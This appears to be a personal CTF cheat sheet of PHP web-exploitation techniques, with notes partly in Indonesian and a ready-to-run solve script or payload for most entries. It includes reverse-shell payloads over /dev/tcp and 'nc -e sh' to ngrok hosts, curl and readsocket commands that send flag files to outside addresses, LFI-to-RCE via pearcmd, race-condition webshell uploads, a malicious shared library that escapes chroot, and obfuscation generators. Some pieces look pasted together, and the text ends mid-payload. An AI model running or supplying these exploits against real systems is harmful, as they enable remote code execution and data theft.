GET /debug/<@urlencode_all><@urlencode_all>Debug/var/www/src/modules/debug.php:5$0</@urlencode_all></@urlencode_all>/phpinfo/CONFIG_CONFIG_module_namespace/<@urlencode_all>%00<@urlencode_all>App\Modules</@urlencode_all></@urlencode_all> HTTP/1.1
PHP Mailer CVE 2016 with EXIM4
| Event Name | Midnight Sun CTF 2025 Quals |
| GitHub URL | - |
| Challenge Name | UselessCorp |
Attachments
References
solve 1
Here's the script I used for ACE on uselesscorp:
import requests
import base64
REV_SHELL_IP = '10.20.30.40'
REV_SHELL_PORT = 1337
HOST = '<http://localhost/>'
# HOST = '<https://useless-94tszh4z.ctf.pro>'
sess = requests.Session()
def send_mail(email: str):
data = {
'name': 'a',
'email': email,
'subject': 'cool',
'message': 'Important message',
'submit': 'submit',
}
print(f'Sending {email = }')
sess.post(HOST + '/index.php', data=data)
def run_cmd(cmd: str):
exploit = '${run,preexpand{${base64d:' + base64.b64encode(cmd.encode()).decode() + '}}}'
send_mail('"a\\\\" -be ' + exploit + ' "@a')
# Delete /tmp/a first in case it exists. Convenience, because we're appending later
run_cmd("/bin/rm /tmp/a")
# Then write our target command to `/tmp/a` one char at a time:
TARGET_CMD = f"""
/bin/bash -i >& /dev/tcp/{REV_SHELL_IP}/{REV_SHELL_PORT} 0>&1
""".strip()
assert "'" not in TARGET_CMD and '"' not in TARGET_CMD
for c in TARGET_CMD:
run_cmd(f'''/bin/sh -c "echo -n '{c}'>>/tmp/a"''')
# Now we execute the file we've written
run_cmd("/bin/bash /tmp/a")
# And clean up at the end
run_cmd("/bin/rm /tmp/a")
solve 2
curl -X POST https://useless-94tszh4z.ctf.pro -d 'name=a' -d 'subject=a' -d 'message=a' -d 'submit=submit' -d 'email="\" -be ${readsocket{inet:0.tcp.ap.ngrok.io:19066}{${readfile{/flag.txt}}}} "@x'solve 3
TLDR writeup for Uselesscorp
/includes from the style cssclass.phpmailer.phpbe${readsockets{message_here}} with ngrok- It does work!
${readfile{/flag.txt}} to get flag content${readsocket{inet:ngrok.url.here:ngrok.port}{${readfile{/flag.txt}}}}
peclcmd.php to get code execution without write a file and with write a file
| Event Name | SEETF 2023 |
| GitHub URL | https://github.com/zeyu2001/My-CTF-Challenges/tree/main/SEETF-2023/readonly https://hackmd.io/@Solderet/AngstromCTF2023#Filestore---Web |
| Challenge Name | readonly |
Without write a file
GET /?page=../usr/local/lib/php/peclcmd.php&+run-tests+-i+-r"system(hex2bin('PAYLOAD'));"+/usr/local/lib/php/test/Console_Getopt/tests/bug11068.phpt HTTP/1.1
GET /?page=../usr/local/lib/php/peclcmd.php&+run-tests+-i+-r`sleep$\{IFS\}5`+/usr/local/lib/php/test/Console_Getopt/tests/bug11068.phpt HTTP/1.1
../../../../../../../../../../usr/local/lib/php/peclcmd
+run-tests+-i+-r`sleep${IFS}5`+/usr/local/lib/php/test/Console_Getopt/tests/bug11068.phpt
../../../../../../../../../../usr/local/lib/php/peclcmd&x=+run-tests+-i+-r`sleep${IFS}5`+/usr/local/lib/php/test/Console_Getopt/tests/bug11068.phpt
With write a file
curl "https://filestore.web.actf.co/?f=../../../../usr/local/lib/php/pearcmd.php&+-c+/tmp/foo.php+-d+man_dir=><?echo(system(\\$_GET\\['a'\\]));?>+-s+"
curl "http://172.26.119.33:9100/wp-content/plugins/kiwiblocks/src/admin-panel/views/panel.php?tab=../../../../../../../../../../usr/local/lib/php/peclcmd.php&+run-tests+-i+-r\"system(hex2bin('$(echo "curl 77.37.47.226:4444 -d \"`cat /*`\"" | hexdump -v -e '/1 "%02x"' | tr -d '\n')'));\"+/usr/local/lib/php/test/Console_Getopt/tests/bug11068.phpt"
PHP Extract + Dompdf Options
| Event Name | Cyber Jawara National 2024 |
| GitHub URL | - |
| Challenge Name | Name Card |
Attachments
data%5Bname%5D=a&data%5BphotoUrl%5D=https://letsenhance.io/static/73136da51c245e80edc6ccfe44888a99/1015f/MainBefore.jpg<?=system('ls');?>&data%5Bemail%5D=aa%40mail.com&data%5Bphone%5D=08111111111111&data%5Baddress%5D=aaaaaaaaaaaa&data[config][isRemoteEnabled]=1&data[config][logOutputFile]=/var/www/html/log.php&data[config][debugPng]=1&data[config][debugCss]=1
Case insensitive function call
| Event Name | Patchstack Alliance CTF S02E01 - WordCamp Asia |
| GitHub URL | - |
| Challenge Name | Cool Templates |
Attachments
References
We can call php function case insesitifly. example System() will be treated as system()
php filter bypass
Filter Madness - web
Based on the provided images, here is the exact text contained within them:
Image 1 (image_c7e677.png)
Input
Plaintext
resource=data:,14
zombies for the flag
0
|dechunk
Output
Plaintext
resource=data:,14%0Azombies%20for%20the%20flag%0A0%0A%7Cdechunk
Image 2 (image_c7e559.png)
Browser URL Bar
Plaintext
https://filter-madness-tlejfksioa-ul.a.run.app/?madness=resource=data:,14%0Azombies%20for%20the%20flag%0A0%0A%7Cdechunk
Page Content
Plaintext
Warning: file_get_contents(): Unable to locate filter "resource=data:,14 zombies for the flag 0 " in /var/www/html/index.php on line 11
Warning: file_get_contents(): Unable to create filter (resource=data:,14 zombies for the flag 0 ) in /var/www/html/index.php on line 11
Warning: file_get_contents(): Unable to locate filter "resource=" in /var/www/html/index.php on line 11
Warning: file_get_contents(): Unable to create filter (resource=) in /var/www/html/index.php on line 11
Warning: file_get_contents(): Unable to locate filter "etc" in /var/www/html/index.php on line 11
Warning: file_get_contents(): Unable to create filter (etc) in /var/www/html/index.php on line 11
Warning: file_get_contents(): Unable to locate filter "passwd" in /var/www/html/index.php on line 11
Warning: file_get_contents(): Unable to create filter (passwd) in /var/www/html/index.php on line 11
Can you submit some madness that will return the flag?
Your filter madness: php://filter/resource=data:,14 zombies for the flag 0 |dechunk/resource=/etc/passwd
Your filter madness length: 83
Your filter madness results: wctf{m4y6e-th15-15-4-6u9-1n-php-83047}
Bypass Exit in php, php file upload if we can manipulate the start of the file_put_contents posibility to use php filter chain
| Event Name | Patchstack Alliance CTF S02E01 - WordCamp Asia |
| GitHub URL | - |
| Challenge Name | Blocked |
Attachments
References
$write = <<<EOF
<?php
exit('ha?');
// $content
EOF;
file_put_contents($name . '.php', $write);
it’s possible to gain rce in this kind of code if we can manipulate $name, we can use php filter chain.
imagepng is one of many function that we can use php filter chain to manipulate it’s output if we can manipulate start of the filename
| Event Name | Patchstack Alliance CTF S02E01 - WordCamp Asia |
| GitHub URL | - |
| Challenge Name | Sneaky |
Attachments
References
LessPHP 0day version "wikimedia/less.php": "5.2.1", if we can controll the SetImportDirs
| Event Name | PWNME CTF Quals 2025 |
| GitHub URL | https://github.com/Phreaks-2600/PwnMeCTF-2025-quals/blob/main/Web/Pwnshop/solve/README.md |
| Challenge Name | Pwnshop |
Attachments
References
if (file_exists($customLessPath)) {
$customLess = file_get_contents($customLessPath);
$parser = new \Less_Parser();
$importDirs = $this->getImportDirectories();
$parser->SetImportDirs($importDirs);
$parser->parse($customLess);
$customCSS = $parser->getCss();
$css .= "\n/* Custom CSS */\n" . $customCSS;
}
PHP SESSION UPLOAD PROGRESS SESSION FILE WRITE
https://book.hacktricks.xyz/pentesting-web/file-inclusion/via-php_session_upload_progress
not working if as example require $path.".php" appended with .php
solver
import httpx
import asyncio
URL = "http://localhost"
CMD = "dir"
# change to php session location, eg: /var/lib/php/sessions or /tmp or /xampp/tmp
SESSION_LOCATION = "/xampp/tmp"
SESSION_NAME = "sebastian"
FILE_SIZE = 1_000_000
REQUEST_NUM = 100
class BaseAPI:
def __init__(self, url=URL) -> None:
self.c = httpx.AsyncClient(base_url=url, timeout=999)
def lfi(self, file, cmd):
return self.c.post(f"/wp-admin/admin-ajax.php?action=nopriv_geo_mashup_query&object_ids=1&object_name=&template=../../../../../../../../../..{SESSION_LOCATION}&cmd={cmd}")
class API(BaseAPI):
async def upload_shell(self):
payload='success<?php system($_GET["cmd"])?>'
res = await self.c.post("/", files={"f": ("foo", "A"*FILE_SIZE)}, data={
'PHP_SESSION_UPLOAD_PROGRESS': payload
}, headers = {
'Cookie': 'PHPSESSID='+SESSION_NAME
})
return res
async def main():
api2 = API()
api = API()
triggered = False
while triggered == False:
pool = []
for _ in range(REQUEST_NUM):
pool.append(api.upload_shell())
for _ in range(REQUEST_NUM):
pool.append(api2.lfi(SESSION_LOCATION+"/sess_"+SESSION_NAME, CMD))
ress = await asyncio.gather(*pool)
for res in ress:
if "success" in res.text:
print(res.text)
triggered = True
break
if __name__ == "__main__":
asyncio.run(main())RCE via HTML Template Injection in require()
if there a html injection + require gadget, we can use this to gain RCE using that template injection by bruteforcing the file descriptor that render the html injection
PHP Reflection class
Unsecure (TCP1P CTF 2023)
<?php
include 'GadgetOne/Adders.php';
include 'GadgetTwo/Echoers.php';
include 'GadgetThree/Vuln.php';
use GadgetOne\\Adders;
use GadgetTwo\\Echoers;
use GadgetThree\\Vuln;
/* Gadget Three */
$vuln = new Vuln();
$vuln->waf1 = 1;
$reflection2 = new \\ReflectionProperty(get_class($vuln), 'waf2');
$reflection2->setAccessible(true);
$reflection2->setValue($vuln, "\\xde\\xad\\xbe\\xef");
# $vuln->cmd = "system('ls -alh');";
$vuln->cmd = "system('cat 182939124819238912571292389218129123.txt');echo '\\n';";
/* Gadget One */
$adder=new Adders($vuln);
/* Gadget Two */
$echoers = new Echoers();
$reflection3 = new \\ReflectionProperty(get_class($echoers), 'klass');
$reflection3->setAccessible(true);
$reflection3->setValue($echoers, $adder);
$serialized = serialize($echoers);
echo base64_encode($serialized);
echo "\\n\\n";
Bypassing PHP Openssl_descrypt mode aes-128-gcm authentication using one byte $tag technique (TSGCTF2023) (DANCE)
<?php
$auth = "guest";
$cipher = "aes-128-gcm";
$key = "asdkwosqdiwq";
$ivlen = openssl_cipher_iv_length($cipher);
$iv = "qwinviwjeqwoqw";
$encrypted_auth = openssl_encrypt($auth, $cipher, $key, $options = 0, $iv, $tag);
echo "guest enc";
var_dump($encrypted_auth);
$decoded = base64_encode((base64_decode($encrypted_auth) ^ "guest")^"admin") ;
echo "Admin tamper enc ";
var_dump($decoded);
echo "tag before ";
var_dump($tag);
for ($i=0;$i<255;$i++){
$tag = chr($i);
$encrypted = openssl_decrypt($decoded,$cipher,$key,0,$iv,$tag);
if ($encrypted){
echo "tag matched ";
var_dump($tag);
echo "decode our tampered admin cookie ";
var_dump($encrypted);
}
}
https://hackmd.io/@Ud2Y6umGS0e2DCVusYcQ3w/r15gGTNXa
dari writeup ditas kita bisa simpulkan bahwa kita bisa mentaper $tag nya dengan menebak bytes pertama saja ini dikarnakan fungsi openssl_decrypt di php tidak melakukan pengecekan length dari $tag sehingga kita bisa memberi 1 byte ke openssl_decrypt membuat openssl_decrypt hanya me-matching 1 byte dari original $tag
Int trim in PHP
php > echo (int) "12asd";
12
Maybe unserialize
jadi klo make func maybe_unserialize itu pasti bakalan nge-serialize lagi dari input yang formatnya udah serialized. misal nginput object, ntar bakalan di serialized lagi jadi string
nah, menariknya.. ini bisa dilewati dengan cara ga make ; atau } ntar tetep jadi object. Cuma menariknya lagiii, kalau make fungsi unserialize itu tetep bisa nge-unserialize serialized yang ga complete (missing ; atau })
ex:
<?php
class Flag
{
private $msg;
public function __wakeup(): void
{
require "flag.php";
$this->msg = $flag;
$this->printFlag();
}
public function printFlag()
{
print($this->msg);
}
}
function maybe_serialize($data)
{
if (is_array($data) || is_object($data)) {
return serialize($data);
}
if (is_serialized($data, false)) {
return serialize($data);
}
return $data;
}
function is_serialized($data, $strict = true)
{
// If it isn't a string, it isn't serialized.
if (!is_string($data)) {
return false;
}
$data = trim($data);
if ('N;' === $data) {
return true;
}
if (strlen($data) < 4) {
return false;
}
if (':' !== $data[1]) {
return false;
}
if ($strict) {
$lastc = substr($data, -1);
if (';' !== $lastc && '}' !== $lastc) {
return false;
}
} else {
$semicolon = strpos($data, ';');
$brace = strpos($data, '}');
var_dump($data);
var_dump($semicolon.$brace);
// Either ; or } must exist.
if (false === $semicolon && false === $brace) {
return false;
}
// But neither must be in the first X characters.
if (false !== $semicolon && $semicolon < 3) {
return false;
}
if (false !== $brace && $brace < 4) {
return false;
}
}
$token = $data[0];
switch ($token) {
case 's':
if ($strict) {
if ('"' !== substr($data, -2, 1)) {
return false;
}
} elseif (!str_contains($data, '"')) {
return false;
}
// Or else fall through.
case 'a':
case 'O':
case 'E':
return (bool) preg_match("/^{$token}:[0-9]+:/s", $data);
case 'b':
case 'i':
case 'd':
$end = $strict ? '$' : '';
return (bool) preg_match("/^{$token}:[0-9.E+-]+;$end/", $data);
}
return false;
}
// $user_input = serialize(new Flag());
$user_input = "O:4:\\"Flag\\":0:{";
$serialized_result = maybe_serialize($user_input);
var_dump(json_encode($user_input));
var_dump($user_input);
var_dump($serialized_result);
var_dump(unserialize($serialized_result));
// var_dump(unserialize($user_input));
Change root director
in php we can change root directory usign chroot();
if chroot is changed, it's possible for us to change configuration of the php, and potentialy bypass open_basedir. but there's so many restriction to using chroot like you need root privilage and you need to use php cli to run your script. You can obtain more information about chroot here https://www.php.net/manual/en/function.chroot.php
ASIS CTF 2023 final challenge phphphphp
dl, load a malcious php library
ASIS CTF 2023 final challenge phphphphp
you can use dl to load a malcious library, but you need to use php cli or something with enable_dl=true
example payload:
from asis ctf challenge phphphphphp
from pwn import *
import time, base64, os
with open("foo.c", "wb") as f:
f.write(b"""
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>
#include <stdio.h>
static void foo() __attribute__((constructor));
void foo(void)
{
puts("pwned\\\\n");
mkdir("chroot-dir", 0755);
chroot("chroot-dir");
// escape from chroot
for(int i = 0; i < 1000; i++) {
chdir("..");
}
chroot(".");
system("cat /flag.txt");
}
""")
os.system("gcc -o libfoo.so -shared foo.c")
libfoo = open("libfoo.so", "rb").read()
payload = b"""
<?php
$libfoo = "###DATA###";
$libfoo = base64_decode($libfoo);
chroot("/tmp");
mkdir("/var/www/sbx/usr/local/lib/php/extensions/no-debug-non-zts-20230831", 0777, true);
file_put_contents("/var/www/sbx/usr/local/lib/php/extensions/no-debug-non-zts-20230831/foo.so", $libfoo);
chmod("/var/www/sbx/usr/local/lib/php/extensions/no-debug-non-zts-20230831/foo.so", 0777);
chroot("/var/www/sbx");
dl("foo");
?>
""".strip()
payload = payload.replace(b"###DATA###", base64.b64encode(libfoo))
while True:
with remote("3.75.187.223", 7321, level="debug") as io:
line = io.recv()
if b"one try every" in line:
print("timeout from ip, waiting")
time.sleep(5)
continue
print(line)
print("sending payload")
io.sendline(str(len(payload)).encode())
io.send(payload)
io.interactive()
break
full phphphphphp solvee script
PHP Obfuscation (Stress Release Service TETCTF 2024)
string_code = ['system','cat s*']
obfuscated_code = ""
charset = ["\\\\","'",".","?",'(',')', '^']
def escape_char(s):
to_escape = {
"'": "\\\\'",
"\\\\": "\\\\\\\\"
}
if s in to_escape:
return to_escape[s]
else:
return s
def search(s):
for j in charset:
for k in charset:
for l in charset:
for m in charset:
for n in charset:
for o in charset:
for p in charset:
if ord(j) ^ ord(k) == ord(s):
return ".('%s'^'%s')" % (escape_char(j), escape_char(k))
if ord(j) ^ ord(k) ^ ord(l) == ord(s):
return ".('%s'^'%s'^'%s')" % (escape_char(j), escape_char(k), escape_char(l))
if ord(j) ^ ord(k) ^ ord(l) ^ ord(m) == ord(s):
return ".('%s'^'%s'^'%s'^'%s')" % (escape_char(j), escape_char(k), escape_char(l), escape_char(m))
if ord(j) ^ ord(k) ^ ord(l) ^ ord(m) ^ ord(n) == ord(s):
return ".('%s'^'%s'^'%s'^'%s'^'%s')" % (escape_char(j), escape_char(k), escape_char(l), escape_char(m), escape_char(n))
if ord(j) ^ ord(k) ^ ord(l) ^ ord(m) ^ ord(n) ^ ord(o) == ord(s):
return ".('%s'^'%s'^'%s'^'%s'^'%s'^'%s')" % (escape_char(j), escape_char(k), escape_char(l), escape_char(m), escape_char(n), escape_char(o))
if ord(j) ^ ord(k) ^ ord(l) ^ ord(m) ^ ord(n) ^ ord(o) ^ ord(p) == ord(s):
return ".('%s'^'%s'^'%s'^'%s'^'%s'^'%s'^'%s')" % (escape_char(j), escape_char(k), escape_char(l), escape_char(m), escape_char(n), escape_char(o), escape_char(p))
return False
for code in string_code:
obfuscated = ""
for i in code:
tmp = search(i)
if not tmp:
obfuscated += ".'%s'" % i
else:
obfuscated += tmp
obfuscated_code += "(%s)" % obfuscated[1:]
print(''.join(["(\\"%s\\")" % i for i in string_code]) + '=' + obfuscated_code)
PHP xor bin without ' and "
<?php
function get_xor($str){
for ($i = 10; $i < 99; $i++) {
for ($j = 10; $j < 99; $j++) {
if ((hex2bin(strval($j)) ^ hex2bin(strval($i))) === $str) {
return [$j, $i];
}
}
}
return false;
}
function get_xor_str($str){
$result = [];
foreach (str_split($str) as $char) {
$result[] = get_xor($char);
}
return $result;
}
function get_xor_joined($str){
$result = "join(hex2bin(00),[";
$arrxor = get_xor_str($str);
foreach ($arrxor as $ab){
$a = $ab[0];
$b = $ab[1];
$result .= "hex2bin($a)^hex2bin($b),";
}
$result = rtrim($result, ',') . "])";
return $result;
}
$inputString = "ls /";
echo get_xor_joined($inputString)."\\n";
preg_match
there's special case where we can make preg_match("/([^a-z])+/s", $input) to outputing false.
in this case we need to add "A"*9000 to make it return false
https://hackmd.io/@abdinata/Website-Challenge-0xL4ughCTF-2024#Simple-WAF
https://www.php.net/manual/en/function.include.php
It is also able to include or open a file from a zip file:
<?php
include "something.zip#script.php";
echo file_get_contents("something.zip#script.php");
?>
Note that instead of using / or \\, open a file from a zip file uses # to separate zip name and inner file's name.
Error based full path leak using long filename
WolvCTF 2024
import re
import httpx
URL = "<https://upload-fun-okntin33tq-ul.a.run.app/>"
# URL = "<http://0:5500/>"
class BaseAPI:
def __init__(self, url=URL) -> None:
self.c = httpx.Client(base_url=url)
def f(self, f):
return self.c.get("/", params={"f":f})
def upload(self, f):
return self.c.post("/", files={"f":f,"f":f})
class API(BaseAPI):
...
if __name__ == "__main__":
api = API()
res = api.upload(("a"*1000000, "x"))
uppath = re.search(r"(?<=\\./uploads/).*?(?=_)", res.text).group(0)
res = api.upload(("x", "<?=system('cat /flag*')?>"))
res = api.f(uppath+"_x")
print(res.text)
Bypass require_once / include_once
ACSC quals 2024 challenge DB Explorer
solver
import httpx
# URL = "http://localhost:9000"
URL = "http://db-exp.vuln.live/"
class BaseAPI:
def __init__(self, url=URL) -> None:
self.c = httpx.Client(base_url=url)
class API(BaseAPI):
...
if __name__ == "__main__":
while True:
api = API()
res = api.c.post("/index.php?normal=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/level_checker&admin=/var/lib/mysql/ibtmp1", data={"normal":"x"},headers={"Host": "admin.pepe"})
if "dimasmaulana" in res.text:
print(res.text.replace("\x00", "").encode().replace(b"\xef\xbf\xbd", b""))
"""
copas terus menerus di phpmyadmin
CREATE TEMPORARY TABLE temp (
x BLOB
);
INSERT INTO temp (x) VALUES
(CONCAT("dimasmaulana","<?=system('/flag');?>"));
"""
Using symlink multiple times can allow us to include a file multiple times even when using include_once. This happens because PHP does not check for a file if there are many symlinks.
LFI to rce if nginx exist and we can’t use protocol
0xbb - PHP LFI with Nginx Assistance (bierbaumer.net)
PHP Filter after check
ref: tamuctf 2024 challenge Remote
FILTER_SANITIZE_URL will sanitize and remove all special character that’s not part of filename, so we can do some bypass
if(!preg_match("/(htm)|(php)|(js)|(css)/", $_REQUEST['url'])) {
$url = filter_var($_REQUEST['url'], FILTER_SANITIZE_URL);
ex using newline:
import asyncio
import httpx
from pyngrok import ngrok
from flask import Flask
from threading import Thread
from bs4 import BeautifulSoup
PORT = 6666
TUNNEL = ngrok.connect(PORT, "http").public_url
print("TUNNEL:", TUNNEL)
URL = "https://remote.tamuctf.com/"
# URL = "http://localhost:8080/"
class BaseAPI:
def __init__(self, url=URL) -> None:
self.c = httpx.Client(base_url=url, timeout=9999)
def upload(self, url):
return self.c.post("/index.php", data={"url": url})
def uplaod_file(self, files, data):
return self.c.post("/index.php", files=files, data=data)
def home(self):
return self.c.get("/")
class API(BaseAPI):
...
def webServer(pathname):
app = Flask(__name__)
@app.get(f"/{pathname}")
def home():
return "<?php system($_GET['dimas']);?>"
return Thread(target=app.run, args=('0.0.0.0', PORT))
async def main():
api = API()
pathname = "index.php"
server = webServer(pathname)
server.start()
await asyncio.sleep(1)
# api.c.cookies.set("PHPSESSID", "")
res = api.upload(f"{TUNNEL}/index.ph\np")
phpsessid = api.c.cookies['PHPSESSID']
root = BeautifulSoup(res.text, features="html.parser")
print(f"{URL}/uploads/{phpsessid}/{root.find_all('a').pop().get_attribute_list('href')[0].split('=')[1]}")
server.join()
if __name__ == "__main__":
asyncio.run(main())
the code:
<?php
} else if(isset($_REQUEST['url'])) {
if(!preg_match("/(htm)|(php)|(js)|(css)/", $_REQUEST['url'])) {
$url = filter_var($_REQUEST['url'], FILTER_SANITIZE_URL);
if(filter_var($url, FILTER_VALIDATE_URL)) {
$img = file_get_contents($url);
if($img !== false) {
$mime = substr($url, strrpos($url, '.') + 1);
$file = random_filename(32, 'uploads/' . $sess, $mime);
$f = fopen('uploads/' . $sess . '/' . $file, "wb");
if($f !== false) {
fwrite($f, $img);
fclose($f);
New 2 PHP Trick from b01lers CTF 2024 challenge
web/library_of_<?php
import httpx
import re
URL = "http://192.168.183.138:4444"
# URL = "https://libraryofphp-c20d084bfc71e709.instancer.b01lersc.tf/"
class BaseAPI:
def __init__(self, url=URL) -> None:
self.c = httpx.Client(base_url=url)
def index(self, q):
return self.c.post("/index.php", data={
"q": q,
})
def search(self, s, securify, d):
return self.c.get("/search.php", params={
"s": s,
"securify": securify,
"d": d,
})
class API(BaseAPI):
...
if __name__ == "__main__":
api = API()
# PHPSESSID perlu diberikan nullbyte agar php menghiraukan text setelah nullbyte, setelah itu
# kita berikan nullbyte agar PHPSESSID tidak membaca string setelah nullbyte, ini akan membuat session menjadi invalid
api.c.cookies.set("PHPSESSID", "mysecretsession%00a<?=/*")
# set username "" agar program menggunakna 6 byte terakhir dari PHPSESSID
api.c.cookies.set("username", "")
# payload kita
res = api.index(
q="*/`ls`; //aaax",
)
print(res.text)
id = re.search('(?<=">).*?(?=</a><br>)', res.text).group(0)
res = api.c.get("/search.php?s="+id)
print(res.text)
res = api.search(
s=id,
# hash sha256 dari string "INF"
securify="121b078c0b324860d916f4c10d6dc96ebc4885035ea6fbd75f78de5a3d9f8c41",
# dengan menginputkan 1e1000 kita akan merubah hasil dari `$d + rand(0, getrandmax())` menjadi
# string INF di PHP
# jadi:
# $d + rand(0, getrandmax()) === INF
# hash('sha256', $d + rand(0, getrandmax())) === "121b078c0b324860d916f4c10d6dc96ebc4885035ea6fbd75f78de5a3d9f8c41"
# membypass ini akan memberikan kita akses ke 'include'
d="1e1000"
)
print(res.text)
Bypass sha using INF obj
SHA treats 1e1000+ rand(0, getrandmax()) as INF. When hashing this argument, the program interprets it as a string. Therefore, the result will be the SHA-256 hash of the string "INF".
PHP will not read id of PHPSESSID after %00
In this case, the PHP session algorithm will ignore the string after %00: api.c.cookies.set("PHPSESSID", "mysecretsession%00a<?=/*").
If short_open_tag enabled
b01lers CTF 2024 challenge library_of_<?php
if short_open_tag enabled in php.ini we can do something like this
<?1 system($_GET['x']);
Bypass escapeshellcmd
midight-sun-2024/awkw4ard
If there’s something like this, we can inject a space into the escapeshellcmd, and it will not be sanitized
$iface = escapeshellcmd($_POST['interface']);
exec("iw dev | awk -v iface=".$iface." '/^phy#/ { phy = $0 } $1 == \"Interface\" { interface = $2 } interface == iface { print phy }'", $return);
<?php
/*
FROM php:8.3-fpm-alpine3.19
RUN adduser -D -H -s /sbin/nologin pleb
[...]
USER pleb
CMD ["php-fpm"]
*/
ini_set("display_errors", TRUE);
error_reporting(E_ALL);
?>
<div class="bg-inside">
</div>
</div>
<?php
if(!isset($_POST['interface'])){
highlight_file($_SERVER['SCRIPT_FILENAME']);
exit();
}
$iface = escapeshellcmd($_POST['interface']);
exec("iw dev | awk -v iface=".$iface." '/^phy#/ { phy = $0 } $1 == \"Interface\" { interface = $2 } interface == iface { print phy }'", $return);
$phy = $return[0];
exec('iw '.$phy.' info', $info);
echo "<pre>" . $info[0] . "</pre>\n";
?>
solve
import httpx
URL = "http://awkw4ard-1.play.hfsc.tf/"
# URL = "http://localhost:4444/"
class BaseAPI:
def __init__(self, url=URL) -> None:
self.c = httpx.Client(base_url=url, timeout=999)
def interface(self, interface):
return self.c.post("/", data={"interface": interface})
class API(BaseAPI):
...
if __name__ == "__main__":
api = API()
res = api.interface("nc${IFS}0.tcp.ngrok.io${IFS}17197${IFS}-e${IFS}sh {}BEGIN{system(iface)}#")
print(res.text)
symlink trick if there’s blocked function
param_payload = ".ini_set('display_errors', 1).symlink($_FILES['file']['tmp_name'], '/var/www/html/file.shtml').virtual('file.shtml').die()."
PHP Trick Using FIle Upload if File Upload is Restricted to Non PHP File Type Like PNG or JPEG
CODEGATE 2024
vulnerable code
related: business-ctf-2024/web/[Medium] Magicom at main · hackthebox/business-ctf-2024 (github.com)
$poll_skin_path = "$g4[path]/skin/poll/$skin_dir";
if (!file_exists("$poll_skin_path/poll_result.skin.php")) die("skin error");
include_once ("$poll_skin_path/poll_result.skin.php");
$g4[path]=phar:/ dan $skin_dir=../../[path ke gambar]/gambar.jpg/poll_result.skin.phpentar dia include phar://skin/poll/../../[path ke gambar]/gambar.jpg/poll_result.skin.php
anjir gampang
import httpx
import base64
import hashlib
import os
URL = "http://13.125.178.249/"
class BaseAPI:
def __init__(self, url=URL) -> None:
self.c = httpx.Client(base_url=url)
def config(self, g4_path):
return self.c.post("/cheditor5/imageUpload/_config.php", data={"_SERVER[g4_path]": g4_path})
def upload(self, file):
return self.c.post("/cheditor5/imageUpload/upload.php", files={"file": file})
def index(self, sst):
return self.c.post("/adm/index.php", data={
"sst": sst,
"_SERVER[g4_path]": "x",
})
def version(self, g4_path, ):
return self.c.post("/adm/version.php", data={
"_SERVER[g4_path]": g4_path,
"sub_menu": "0",
"auth[0]": "r",
"_SERVER[SERVER_ADDR]": "a",
"_SERVER[REMOTE_ADDR]": "a",
"_SERVER[HTTP_USER_AGENT]": "a",
}, cookies={
hashlib.md5(b"ck_mb_id").hexdigest(): base64.b64encode(b"admin").decode(),
hashlib.md5(b"ck_auto").hexdigest(): base64.b64encode(b"47bce5c74f589f4867dbd57e9ca9f808").decode()
})
def poll_result(self, filePath):
return self.c.post("/bbs/poll_result.php", data={
"skin_dir": filePath,
"_SERVER[g4_path]": "phar:/",
"po_id": 1,
})
class API(BaseAPI):
...
with open("payload.php", "wb") as f:
payload = r"""<?php
$jpeg_header_size =
"\xff\xd8\xff\xe0\x00\x10\x4a\x46\x49\x46\x00\x01\x01\x01\x00\x48\x00\x48\x00\x00\xff\xfe\x00\x13".
"\x43\x72\x65\x61\x74\x65\x64\x20\x77\x69\x74\x68\x20\x47\x49\x4d\x50\xff\xdb\x00\x43\x00\x03\x02".
"\x02\x03\x02\x02\x03\x03\x03\x03\x04\x03\x03\x04\x05\x08\x05\x05\x04\x04\x05\x0a\x07\x07\x06\x08\x0c\x0a\x0c\x0c\x0b\x0a\x0b\x0b\x0d\x0e\x12\x10\x0d\x0e\x11\x0e\x0b\x0b\x10\x16\x10\x11\x13\x14\x15\x15".
"\x15\x0c\x0f\x17\x18\x16\x14\x18\x12\x14\x15\x14\xff\xdb\x00\x43\x01\x03\x04\x04\x05\x04\x05\x09\x05\x05\x09\x14\x0d\x0b\x0d\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14".
"\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\xff\xc2\x00\x11\x08\x00\x0a\x00\x0a\x03\x01\x11\x00\x02\x11\x01\x03\x11\x01".
"\xff\xc4\x00\x15\x00\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\xff\xc4\x00\x14\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xda\x00\x0c\x03".
"\x01\x00\x02\x10\x03\x10\x00\x00\x01\x95\x00\x07\xff\xc4\x00\x14\x10\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\xff\xda\x00\x08\x01\x01\x00\x01\x05\x02\x1f\xff\xc4\x00\x14\x11".
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\xff\xda\x00\x08\x01\x03\x01\x01\x3f\x01\x1f\xff\xc4\x00\x14\x11\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20".
"\xff\xda\x00\x08\x01\x02\x01\x01\x3f\x01\x1f\xff\xc4\x00\x14\x10\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\xff\xda\x00\x08\x01\x01\x00\x06\x3f\x02\x1f\xff\xc4\x00\x14\x10\x01".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\xff\xda\x00\x08\x01\x01\x00\x01\x3f\x21\x1f\xff\xda\x00\x0c\x03\x01\x00\x02\x00\x03\x00\x00\x00\x10\x92\x4f\xff\xc4\x00\x14\x11\x01\x00".
